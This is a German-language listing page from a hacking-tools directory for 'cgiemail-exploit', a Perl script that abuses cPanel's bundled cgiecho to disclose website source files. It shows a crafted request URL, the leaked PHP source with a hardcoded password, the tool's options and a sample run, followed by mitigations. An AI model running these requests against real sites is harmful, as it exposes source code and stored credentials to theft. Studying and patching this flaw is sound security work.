Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cgiemail-exploit — Cgiemail - Source Code Disclosure/LFI | Kitploit
Tools/GitHubGitHub/finbar-crago/cgiemail-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubfinbar-crago/cgiemail-exploit

cgiemail-exploit

Cgiemail - Source Code Disclosure/LFI

Repository anzeigen
151vor 9 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Cgiemail – Exploit zur Offenlegung von Quellcode/Lokalem Dateieinschluss

cgiecho, ein mit cgiemail enthaltenes Skript, gibt jede Datei unter dem Dokumentenroot einer Website zurück, wenn die Datei eckige Klammern enthält und der Text innerhalb der Klammern erraten werden kann.

cgiemail wird derzeit mit cPanel ausgeliefert und ist standardmäßig aktiviert.

screen-shot

Beispiel

Für die Seite:

root@kitploit:~
<?php // http://hostname/login.php
if($_GET['user'] == 'admin' && $_GET['pass'] == 'thisissecure'){ /*...*/ }

Anfrage:

root@kitploit:~
http://hostname/cgi-sys/cgiecho/login.php?'pass'=['pass']

Ergebnis:

root@kitploit:~
<HEAD><TITLE>Success</TITLE></HEAD>
<BODY>Processed form looks like this:<P><HR><PRE>
&lt;?php // http://hostname/login.php
if($_GET == 'admin' && $_GET['pass'] == 'thisissecure'){ /*..*/ }
</PRE><P>
<P><EM>cgiemail 
1.6
</EM></BODY>

cgiemail-exploit.pl

root@kitploit:~
Usage: ./cgiemail-exploit.pl [options] target

Options:
  --names         Check for names in commer separated list
  --num           Check for numbers
  --num-max       Maximum number to check (default 10)
  --php           Check PHP $_SERVER Variables
  --batch         Number of arguments sent per request (default 10)
  --cgiecho-path  Path of cgiecho on server (default '/cgi-sys/cgiecho/')
  --user-agent    Set user-agent (default 'Mozilla/5.0')
  --deley         Pause between requests in seconds (default 1)
  --timeout       Set connection timeout (default 10)

Beispiel

root@kitploit:~
$ ./cgiemail-exploit.pl --num --names 'email,password' http://hostname/login.php > login.php
detected cgiemail 1.6
request 1 of 2...
success!
url: http://hostname//cgi-sys/cgiecho/login.php?0=[0]&1=[1]&2=[2]&3=[3]&4=[4]&5=[5]&6=[6]&7=[7]&8=[8]&9=[9]&

Einschränkungen

  • Wenn für eine Variable kein Wert angegeben wird, wird sie ausgeschlossen; erwarte also einige '$_POST/$_GET'-Variablen mit fehlenden [] ...

Lösungen

  • cgiemail nicht verwenden...
  • cgiemail deaktivieren...
  • falls du aus irgendeinem Grund auf einem System mit cgiemail festhängst: Die maximale Variablenlänge beträgt 255; eine lange Zeichenkette innerhalb eckiger Klammern führt zu einem Fehler.
  • keine eckigen Klammern verwenden?

Referenz

  • http://web.mit.edu/wwwdev/cgiemail/webmaster.html#security
  • https://documentation.cpanel.net/display/1144Docs/Tweak+Settings+-+Security#TweakSettings-Security-CGIEmailandCGIEcho
Tool herunterladen